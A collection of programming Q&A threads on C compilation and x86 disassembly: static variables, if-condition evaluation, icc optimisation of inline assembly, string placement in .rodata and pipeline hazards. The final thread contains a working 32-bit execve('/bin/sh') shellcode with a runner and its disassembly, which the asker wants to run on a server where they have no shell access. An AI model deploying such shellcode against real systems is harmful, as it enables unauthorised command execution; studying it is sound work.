When static variables are created in c language - c

Here gdb does not stop at Line:4.
Next,
Without hitting the declaration line at Line:5, variable x is existing and initialized.
Next,
But here it shows out of scope (yes it should according to me).
Now, I have the following doubts regarding this particular instance of c program.
When exactly the memory for variable x in P1() gets created and initialized?
why gdb did not stop at static declaration statement in inside P1() in the first example?
If we call P1() again will the program control simply skip the declaration statement?

It has already been explained (in related topics linked in comments below question) how static variables work.
Here is actual code generated by a gcc for your p1 function (by gcc -c -O0 -fomit-frame-pointer -g3 staticvar.c -o staticvar.o) then disassembled with related source.
Disassembly of section .text:
0000000000000000 <p1>:
#include <stdio.h>
void p1(void)
{
0: 48 83 ec 08 sub $0x8,%rsp
static int x = 10;
x += 5;
4: 8b 05 00 00 00 00 mov 0x0(%rip),%eax # a <p1+0xa>
a: 83 c0 05 add $0x5,%eax
d: 89 05 00 00 00 00 mov %eax,0x0(%rip) # 13 <p1+0x13>
printf("%d\n", x);
13: 8b 05 00 00 00 00 mov 0x0(%rip),%eax # 19 <p1+0x19>
19: 89 c6 mov %eax,%esi
1b: bf 00 00 00 00 mov $0x0,%edi
20: b8 00 00 00 00 mov $0x0,%eax
25: e8 00 00 00 00 callq 2a <p1+0x2a>
}
2a: 90 nop
2b: 48 83 c4 08 add $0x8,%rsp
2f: c3 retq
So, as you see there is no code for declaration of x. GDB can only break on actual machine code instruction and as there is none, it breaks on next instruction (mov), which matches line 5.

Related

'if' test condition in c - does it evaluate?

When calling a function in the test portion of an if statement in c, does it evaluate exactly as if you had called it normally? As in, will all the effects besides the return value evaluate and persist?
For example, if I want to include an error check when calling fseek, can I write
if( fseek(file, 0, SEEK_END) ) {fprintf(stderr, "File too long")};
and be functionally the same as:
long int i = fseek(file, 0, SEEK_END);
if( i ) {fprintf(stderr, "File too long")};
?
https://www.gnu.org/software/gnu-c-manual/gnu-c-manual.html#The-if-Statement
https://www.gnu.org/software/libc/manual/html_node/File-Positioning.html
Yes, this is exactly the same. This only difference is you won't be able to use again the result of the operation executed in the if statement.
In both cases the operation is being executed BEFORE the condition (comparison) happens. To illustrate this, we can see what is the result of the two different cases in machine code. Please do note that the output machine code will vary depending of the OS and compiler.
Source file 'a.c':
#include <stdio.h>
int
main(void)
{
FILE *f = fopen("testfile", "r");
long int i = fseek(f, 0, SEEK_END);
if (i)
fprintf(stderr, "Error\n");
return 0;
}
$ gcc -O1 a.c -o a
Source file 'b.c':
#include <stdio.h>
int
main(void)
{
FILE *f = fopen("testfile", "r");
if (fseek(f, 0, SEEK_END))
fprintf(stderr, "Error\n");
return 0;
}
$ gcc -O1 b.c -o b
You will note that for both cases I used the option '-O1' which allows the compiler to introduce small optimizations, this is mostly to make the machine code a little cleaner as without optimization the compiler converts "literally" to machine code.
$ objdump -Mintel -D a |grep -i main -A20
0000000000001189 <main>:
1189: f3 0f 1e fa endbr64
118d: 48 83 ec 08 sub rsp,0x8
1191: 48 8d 35 6c 0e 00 00 lea rsi,[rip+0xe6c] # 2004 <_IO_stdin_used+0x4>
1198: 48 8d 3d 67 0e 00 00 lea rdi,[rip+0xe67] # 2006 <_IO_stdin_used+0x6>
119f: e8 dc fe ff ff call 1080 <fopen#plt>
# Interesting part
11a4: 48 89 c7 mov rdi,rax # Sets return of fopen as param 1
11a7: ba 02 00 00 00 mov edx,0x2 # Sets Ox2 (SEEK_END) as param 3
11ac: be 00 00 00 00 mov esi,0x0 # Sets 0 as param 2
11b1: e8 ba fe ff ff call 1070 <fseek#plt> # Call to FSEEK being made and stored in register
11b6: 85 c0 test eax,eax # Comparison being made
11b8: 75 0a jne 11c4 <main+0x3b> # Comparison jumping
# End of interesting part
11ba: b8 00 00 00 00 mov eax,0x0
11bf: 48 83 c4 08 add rsp,0x8
11c3: c3 ret
11c4: 48 8b 0d 55 2e 00 00 mov rcx,QWORD PTR [rip+0x2e55] # 4020 <stderr##GLIBC_2.2.5>
11cb: ba 06 00 00 00 mov edx,0x6
11d0: be 01 00 00 00 mov esi,0x1
11d5: 48 8d 3d 33 0e 00 00 lea rdi,[rip+0xe33] # 200f <_IO_stdin_used+0xf>
11dc: e8 af fe ff ff call 1090 <fwrite#plt>
11e1: eb d7 jmp 11ba <main+0x31>
11e3: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
11ea: 00 00 00
11ed: 0f 1f 00 nop DWORD PTR [rax]
Objdumping on binary 'b' yields an almost identical same machine code result. To sum it up, whatever you put in your if statement is evaluated and will yield a beind-the-scene equivalent result whether or not you assign it a variable first.
Edit:
For reference, this is the output of $ objdump -Mintel -D b |grep -i main -A20:
0000000000001189 <main>:
1189: f3 0f 1e fa endbr64
118d: 48 83 ec 08 sub rsp,0x8
1191: 48 8d 35 6c 0e 00 00 lea rsi,[rip+0xe6c] # 2004 <_IO_stdin_used+0x4>
1198: 48 8d 3d 67 0e 00 00 lea rdi,[rip+0xe67] # 2006 <_IO_stdin_used+0x6>
119f: e8 dc fe ff ff call 1080 <fopen#plt>
# Interesting Part
11a4: 48 89 c7 mov rdi,rax
11a7: ba 02 00 00 00 mov edx,0x2
11ac: be 00 00 00 00 mov esi,0x0
11b1: e8 ba fe ff ff call 1070 <fseek#plt>
11b6: 85 c0 test eax,eax
11b8: 75 0a jne 11c4 <main+0x3b>
# End of interesting part
11ba: b8 00 00 00 00 mov eax,0x0
11bf: 48 83 c4 08 add rsp,0x8
11c3: c3 ret
11c4: 48 8b 0d 55 2e 00 00 mov rcx,QWORD PTR [rip+0x2e55] # 4020 <stderr##GLIBC_2.2.5>
11cb: ba 06 00 00 00 mov edx,0x6
11d0: be 01 00 00 00 mov esi,0x1
11d5: 48 8d 3d 33 0e 00 00 lea rdi,[rip+0xe33] # 200f <_IO_stdin_used+0xf>
11dc: e8 af fe ff ff call 1090 <fwrite#plt>
11e1: eb d7 jmp 11ba <main+0x31>
11e3: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
11ea: 00 00 00
11ed: 0f 1f 00 nop DWORD PTR [rax]
The short answer is yes (as in your trivial example), the long answer is maybe.
When the logical expression (any) is more complex the C language evaluates it until the result of the whole expression is fully determined. The remaining operations are not evaluated.
Examples:
int x = 0;
if(x && foo()) {}
the foo will not be called because x is false - and then the whole operation is false.
int x = 1;
if(x && foo()) {}
the foo will be called because x is true and the second part of the expression is needed to get the result.
It is called Short circuit evaluation and all logical expressions in C are evaluated this way.

How to stop icc from eliminating function called from inline assembly

Background
I'm making an app that needs to run several tasks concurrently. I can't use threads and such because the app should work without any OS (i.e. straight from the bootsector). Using x86 tasks looks like an overkill (both logically and performance-wise). Thus, I decided to implement a task-switching utility myself. I would save processor state, make a call to the task code and then restore the previous state. So I have to make the call from inline assembly.
Problem
Here's some example code:
#include <stdio.h>
void func() {
printf("Hello, world!\n");
}
void (*funcptr)();
int main() {
funcptr = func;
asm(
"call *%0;"
:
:"r"(funcptr)
);
return 0;
}
It compiles perfectly under icc with no options, gcc and clang and yields "Hello, world!" when run. However, if I compile it with icc main.c -ipo, it segfaults.
I disassembled the code that was generated by icc main.c and got the following:
0000000000401220 <main>:
401220: 55 push %rbp
401221: 48 89 e5 mov %rsp,%rbp
401224: 48 83 e4 80 and $0xffffffffffffff80,%rsp
401228: 48 81 ec 80 00 00 00 sub $0x80,%rsp
40122f: bf 03 00 00 00 mov $0x3,%edi
401234: 33 f6 xor %esi,%esi
401236: e8 45 00 00 00 callq 401280 <__intel_new_feature_proc_init>
40123b: 0f ae 1c 24 stmxcsr (%rsp)
40123f: 48 c7 05 f6 78 00 00 movq $0x401270,0x78f6(%rip) # 408b40 <funcptr>
401246: 70 12 40 00
40124a: b8 70 12 40 00 mov $0x401270,%eax
40124f: 81 0c 24 40 80 00 00 orl $0x8040,(%rsp)
401256: 0f ae 14 24 ldmxcsr (%rsp)
40125a: ff d0 callq *%rax
40125c: 33 c0 xor %eax,%eax
40125e: 48 89 ec mov %rbp,%rsp
401261: 5d pop %rbp
401262: c3 retq
401263: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
401268: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
40126f: 00
0000000000401270 <func>:
401270: bf 04 40 40 00 mov $0x404004,%edi
401275: e9 e6 fd ff ff jmpq 401060 <puts#plt>
40127a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
On the other hand, icc main.c -ipo yields:
0000000000401210 <main>:
401210: 55 push %rbp
401211: 48 89 e5 mov %rsp,%rbp
401214: 48 83 e4 80 and $0xffffffffffffff80,%rsp
401218: 48 81 ec 80 00 00 00 sub $0x80,%rsp
40121f: bf 03 00 00 00 mov $0x3,%edi
401224: 33 f6 xor %esi,%esi
401226: e8 25 00 00 00 callq 401250 <__intel_new_feature_proc_init>
40122b: 0f ae 1c 24 stmxcsr (%rsp)
40122f: 81 0c 24 40 80 00 00 orl $0x8040,(%rsp)
401236: 48 8b 05 cb 2d 00 00 mov 0x2dcb(%rip),%rax # 404008 <funcptr_2.dp.0>
40123d: 0f ae 14 24 ldmxcsr (%rsp)
401241: ff d0 callq *%rax
401243: 33 c0 xor %eax,%eax
401245: 48 89 ec mov %rbp,%rsp
401248: 5d pop %rbp
401249: c3 retq
40124a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
So, while -ipo didn't remove funcptr variable (see address 401236), it did remove assignment. I guess that icc noticed that func is not called from C code so it can be safely removed, so funcptr is allowed to contain garbage. However, it didn't notice that I'm calling func indirectly via assembly.
What I tried
Replacing "r"(funcptr) with "r"(func) works but I can't hardcode a specific function (see background).
Calling funcptr and/or func before and/or after inline assembly block don't help because icc just inlines printf("Hello, world!\n");.
I can't get rid of inline assembly because I have to do low-level register, flags and stack manipulation before and after call.
Making funcptr volatile yields the following warning but still segfaults:
a value of type "void (*)()" cannot be assigned to an entity of type "volatile void (*)()"
Adding volatile to almost every other word doesn't help either.
Moving func and/or funcptr to other source files and then linking them together doesn't help.
Moving inline assembly to a separate function doesn't work.
Am I doing something wrong or is it an icc bug? If the former, how do I fix the code? If the latter, is there any workaround and should I report the bug?
$ icc --version
icc (ICC) 19.1.0.166 20191121
Copyright (C) 1985-2019 Intel Corporation. All rights reserved.

How does a compiled "Hello World" C program store the String using machine language?

so I've started learning about machine language today. I wrote a basic "Hello World" program in C which prints "Hello, world!" ten times using a for loop. I then used the Gnu Debugger to disassemble main and look at the code in machine language (my computer has a x86 processor and I've set gdb up to use intel syntax):
user#PC:~/Path/To/Code$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list
1 #include <stdio.h>
2
3 int main()
4 {
5 int i;
6 for(i = 0; i < 10; i++) {
7 printf("Hello, world!\n");
8 }
9 return 0;
10 }
(gdb) disassemble main
Dump of assembler code for function main:
0x0804841d <+0>: push ebp
0x0804841e <+1>: mov ebp,esp
0x08048420 <+3>: and esp,0xfffffff0
0x08048423 <+6>: sub esp,0x20
0x08048426 <+9>: mov DWORD PTR [esp+0x1c],0x0
0x0804842e <+17>: jmp 0x8048441 <main+36>
0x08048430 <+19>: mov DWORD PTR [esp],0x80484e0
0x08048437 <+26>: call 0x80482f0 <puts#plt>
0x0804843c <+31>: add DWORD PTR [esp+0x1c],0x1
0x08048441 <+36>: cmp DWORD PTR [esp+0x1c],0x9
0x08048446 <+41>: jle 0x8048430 <main+19>
0x08048448 <+43>: mov eax,0x0
0x0804844d <+48>: leave
0x0804844e <+49>: ret
End of assembler dump.
(gdb) x/s 0x80484e0
0x80484e0: "Hello, world!"
I understand most of the machine code and what each of the commands do. If I understood it correctly, the address "0x80484e0" is loaded into the esp register so that can use the memory at this address. I examined the address, and to no surprise it contained the desired string. My question now is - how did that string get there in the first place? I can't find a part in the program that sets the string up at this location.
I also don't understand something else: When I first start the program, the eip points to , where the variable i is initialized at [esp+0x1c]. However, the address that esp points to is changed later on in the program (to 0x80484e0), but [esp+0x1c] is still used for "i" after that change. Shouldn't the adress [esp+0x1c] change when the address esp points to changes?
I binary or program is made up of both machine code and data. In this case your string which you put in the source code, the compiler too that data which is just bytes, and because of how it was used was considered read only data, so depending on the compiler that might land in .rodata or .text or some other name the compiler might use. Gcc would probably call it .rodata. The program itself is in .text. The linker comes along and when it links things finds a place for .text, .data, .bss, .rodata, and any other items you may have and then connects the dots. In the case of your call to printf the linker knows where it put the string, the array of bytes, and it was told what its name was (some internal temporary name no doubt) and the printf call was told about that name to so the linker patches up the instruction to grab the address to the format string before calling printf.
Disassembly of section .text:
0000000000400430 <main>:
400430: 53 push %rbx
400431: bb 0a 00 00 00 mov $0xa,%ebx
400436: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40043d: 00 00 00
400440: bf e4 05 40 00 mov $0x4005e4,%edi
400445: e8 b6 ff ff ff callq 400400 <puts#plt>
40044a: 83 eb 01 sub $0x1,%ebx
40044d: 75 f1 jne 400440 <main+0x10>
40044f: 31 c0 xor %eax,%eax
400451: 5b pop %rbx
400452: c3 retq
400453: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40045a: 00 00 00
40045d: 0f 1f 00 nopl (%rax)
Disassembly of section .rodata:
00000000004005e0 <_IO_stdin_used>:
4005e0: 01 00 add %eax,(%rax)
4005e2: 02 00 add (%rax),%al
4005e4: 48 rex.W
4005e5: 65 6c gs insb (%dx),%es:(%rdi)
4005e7: 6c insb (%dx),%es:(%rdi)
4005e8: 6f outsl %ds:(%rsi),(%dx)
4005e9: 2c 20 sub $0x20,%al
4005eb: 77 6f ja 40065c <__GNU_EH_FRAME_HDR+0x68>
4005ed: 72 6c jb 40065b <__GNU_EH_FRAME_HDR+0x67>
4005ef: 64 21 00 and %eax,%fs:(%rax)
the compiler will have encoded this instruction but left the address as zeros probably or some fill
400440: bf e4 05 40 00 mov $0x4005e4,%edi
so that the linker could fill it in later. The gnu disassembler attempts to disassemble the .rodata (and .data, etc) blocks which doesnt make sense, so ignore the instructions it is trying to interpret your string which starts at address 0x4005e4.
Before linking a disassembly of the object shows the two sections .text and .rodata
Disassembly of section .text.startup:
0000000000000000 <main>:
0: 53 push %rbx
1: bb 0a 00 00 00 mov $0xa,%ebx
6: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
d: 00 00 00
10: bf 00 00 00 00 mov $0x0,%edi
15: e8 00 00 00 00 callq 1a <main+0x1a>
1a: 83 eb 01 sub $0x1,%ebx
1d: 75 f1 jne 10 <main+0x10>
1f: 31 c0 xor %eax,%eax
21: 5b pop %rbx
22: c3 retq
0000000000000000 <.rodata.str1.1>:
0: 48 rex.W
1: 65 6c gs insb (%dx),%es:(%rdi)
3: 6c insb (%dx),%es:(%rdi)
4: 6f outsl %ds:(%rsi),(%dx)
5: 2c 20 sub $0x20,%al
7: 77 6f ja 78 <main+0x78>
9: 72 6c jb 77 <main+0x77>
b: 64 21 00 and %eax,%fs:(%rax)
unlinked it has to just pad this address/offset for the linker to fill in later.
10: bf 00 00 00 00 mov $0x0,%edi
also note the object contains only the string in .rodata. linking with libraries and other items to make it a complete program clearly added more .rodata, but the linker manages all of that.
Perhaps easier to see with this example
void more_fun ( unsigned int, unsigned int, unsigned int );
unsigned int a;
unsigned int b=5;
const unsigned int c=7;
void fun ( void )
{
more_fun(a,b,c);
}
disassembled as a object
Disassembly of section .text:
0000000000000000 <fun>:
0: 8b 35 00 00 00 00 mov 0x0(%rip),%esi # 6 <fun+0x6>
6: 8b 3d 00 00 00 00 mov 0x0(%rip),%edi # c <fun+0xc>
c: ba 07 00 00 00 mov $0x7,%edx
11: e9 00 00 00 00 jmpq 16 <fun+0x16>
Disassembly of section .data:
0000000000000000 <b>:
0: 05 .byte 0x5
1: 00 00 add %al,(%rax)
...
Disassembly of section .rodata:
0000000000000000 <c>:
0: 07 (bad)
1: 00 00 add %al,(%rax)
...
and for whatever reason you have to link it to see the .bss section. The point of the example is the machine code for the function is in .text, the uninitialized global is in .bss, the initialized global is .data and the const initialized global is .rodata. The compiler was smart enough to know that a const even if it is global wont change so it can just hardcode that value into the math and not need to read from ram, but the other two variables it has to read from ram so generates an instruction with the address zeros to be filled in by the linker at link time.
In your case your read only/const data was a collection of bytes and it wasnt a math operation so the bytes as defined in your source file were placed in memory so they could be pointed at as the first parameter to printf.
There is more to a binary than just machine code. And the compiler and linker can have things placed in memory for the machine code to get, the machine code itself does not have to write every value that will be used by the rest of the machine code.
The compiler 'hard wires' the string into the object code and the linker then 'hard wires' it into the machine code.
Not that the string is embedded into the code, and not stored in a data area meaning that if you took a pointer to the string and attempted to change it you would get an exception.

Create a Data Hazard in a C Program

I am working on a problem where I am attempting to create different scenarios in different C programs such as
Data Hazard
Branch Evaluation
Procedure Call
This is in an attempt at learning pipelining and the different hazards that come up.
So I am writing simple C programs and disassembling to assembly language to see if a hazard gets created. But I cannot figure out how to create these hazards. Do yall have any idea how I could do this? Here is some of the simple code I have written.
I compile using.
gcc -g -c programName.c -o programName.o
gcc programName.o -o programName
objdump -d programName.o > programName.asm
Code:
#include <stdio.h>
int main()
{
int i = 0;
int size = 5;
int num[5] = {1,2,3,4,5};
int sum=0;
int average = 0;
for(i = 0; i < size; i++)
{
sum += num[i];
}
average=sum/size;
return 0;
}
...and here is the assembly for that.
average.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: c7 45 f0 00 00 00 00 movl $0x0,0xfffffffffffffff0(%rbp)
b: c7 45 f4 05 00 00 00 movl $0x5,0xfffffffffffffff4(%rbp)
12: c7 45 d0 01 00 00 00 movl $0x1,0xffffffffffffffd0(%rbp)
19: c7 45 d4 02 00 00 00 movl $0x2,0xffffffffffffffd4(%rbp)
20: c7 45 d8 03 00 00 00 movl $0x3,0xffffffffffffffd8(%rbp)
27: c7 45 dc 04 00 00 00 movl $0x4,0xffffffffffffffdc(%rbp)
2e: c7 45 e0 05 00 00 00 movl $0x5,0xffffffffffffffe0(%rbp)
35: c7 45 f8 00 00 00 00 movl $0x0,0xfffffffffffffff8(%rbp)
3c: c7 45 fc 00 00 00 00 movl $0x0,0xfffffffffffffffc(%rbp)
43: c7 45 f0 00 00 00 00 movl $0x0,0xfffffffffffffff0(%rbp)
4a: eb 10 jmp 5c <main+0x5c>
4c: 8b 45 f0 mov 0xfffffffffffffff0(%rbp),%eax
4f: 48 98 cltq
51: 8b 44 85 d0 mov 0xffffffffffffffd0(%rbp,%rax,4),%eax
55: 01 45 f8 add %eax,0xfffffffffffffff8(%rbp)
58: 83 45 f0 01 addl $0x1,0xfffffffffffffff0(%rbp)
5c: 8b 45 f0 mov 0xfffffffffffffff0(%rbp),%eax
5f: 3b 45 f4 cmp 0xfffffffffffffff4(%rbp),%eax
62: 7c e8 jl 4c <main+0x4c>
64: 8b 55 f8 mov 0xfffffffffffffff8(%rbp),%edx
67: 89 d0 mov %edx,%eax
69: c1 fa 1f sar $0x1f,%edx
6c: f7 7d f4 idivl 0xfffffffffffffff4(%rbp)
6f: 89 45 fc mov %eax,0xfffffffffffffffc(%rbp)
72: b8 00 00 00 00 mov $0x0,%eax
77: c9 leaveq
78: c3 retq
Would appreciate any insight or help. Thanks!
Since this is homework, I'm not going to give you a straight answer, but some food for thought to push you in the right direction.
x86 is a terrible ISA to be using to try and comprehend pipelining. A single x86 instruction can hide two or three side-effects, making it difficult to tease out how a given instruction would perform in even the simplest of pipelines. Are you sure you're not provided a RISC ISA to use for this problem?
Put your loop/hazard code into a function and preferably randomize the creation of the array. Make the array much longer. A good compiler will basically figure out the answer otherwise and remove most of the code you wrote! For reasons I don't understand it's putting your variables in memory.
A good compiler will also do things such as loop unrolling in attempt to hide data hazards and get better code scheduling. Learn how to defeat that (or if you can, give the flag the compiler telling it to NOT do those things if messing around with the compiler is allowed).
The keyword "volatile" can be very helpful in telling the compiler to not optimize around/away certain variables (it tells the compiler this value can change at any moment, so don't be clever and optimize code with it and also don't keep the variable inside the register file).
A data hazard means the pipeline will stall waiting on data. Normally instructions get bypassed just in time, so no stalling occurs. Think about which types of instructions may not be able to be bypassed and could cause a stall on a data hazard. This is dependent on the pipeline, so code that stalls for a specific processor may not stall for another. Modern out-of-order Intel processors are excellent at avoiding these stalls and compilers are great at re-scheduling code so they won't occur even on an in-order core.

shellcode executes /bin/sh but not ./abcde

I am trying to run some shellcode on a server where I dont have access to the shell, but I have access to my own executable bash script.
My shellcode looks like this:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
When I run it locally, I spawn a shell with the code. I can also run other commands such as /bin/ls... However, when I try to change /bin/sh in favor of ./abcde it wont run my executable.
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
What am I doing wrong? I am on a x86-32 machine..
EDIT:
To make it more clear, this is the scenario:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
unsigned char code1[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
int main(void){
void (*f)(void);
f = (void (*)(void))code; //works
f = (void (*)(void))code1; //Does NOT work
f();
}
Your program is not very portable as you include ia32 instructions in your strings. With some help from gdb it was easier to read:
(gdb) disassemble/r code,code1
Dump of assembler code from 0x804a040 to 0x804a080:
0x0804a040 <code+0>: eb 15 jmp 0x804a057 <code+23>
0x0804a042 <code+2>: 5b pop %ebx
0x0804a043 <code+3>: 31 c0 xor %eax,%eax
0x0804a045 <code+5>: 89 5b 08 mov %ebx,0x8(%ebx)
0x0804a048 <code+8>: 88 43 07 mov %al,0x7(%ebx)
0x0804a04b <code+11>: 8d 4b 08 lea 0x8(%ebx),%ecx
0x0804a04e <code+14>: 89 43 0c mov %eax,0xc(%ebx)
0x0804a051 <code+17>: 89 c2 mov %eax,%edx
0x0804a053 <code+19>: b0 0b mov $0xb,%al
0x0804a055 <code+21>: cd 80 int $0x80
0x0804a057 <code+23>: e8 e6 ff ff ff call 0x804a042 <code+2>
0x0804a05c <code+28>: 2f das
0x0804a05d <code+29>: 62 69 6e bound %ebp,0x6e(%ecx)
0x0804a060 <code+32>: 2f das
0x0804a061 <code+33>: 73 68 jae 0x804a0cb
0x0804a063 <code+35>: 00 00 add %al,(%eax)
0x0804a065: 00 00 add %al,(%eax)
0x0804a067: 00 00 add %al,(%eax)
0x0804a069: 00 00 add %al,(%eax)
0x0804a06b: 00 00 add %al,(%eax)
0x0804a06d: 00 00 add %al,(%eax)
0x0804a06f: 00 00 add %al,(%eax)
0x0804a071: 00 00 add %al,(%eax)
0x0804a073: 00 00 add %al,(%eax)
0x0804a075: 00 00 add %al,(%eax)
0x0804a077: 00 00 add %al,(%eax)
0x0804a079: 00 00 add %al,(%eax)
0x0804a07b: 00 00 add %al,(%eax)
0x0804a07d: 00 00 add %al,(%eax)
0x0804a07f: 00 eb add %ch,%bl
however a helpful compiler puts the code in a variable segment which will cause a segmentation fault when the processor jumps to the "string" adn tries to execute from it.
I think this is a similar question:
sys_execve system call from Assembly
A careful reading of the question reveals what is actually going on. Indeed the compiler will happily bork you by placing this in a variable region; however the OS platform targeted probably doesn't have NX enabled (enabling NX on arbitrary 32 bit process was a recipe for disaster for a long time as GCC extensions required the stack to be executable).
The actual problem is you don't have execute access to bash. Your ./abcde is a bash script by your own admission, so the loader interprets #!/bin/bash, goes to open /bin/bash and discovers you don't have x permissions and barfs. exec() returns -Esomething with unpredictable results when you run off the end of the shellcode.

Resources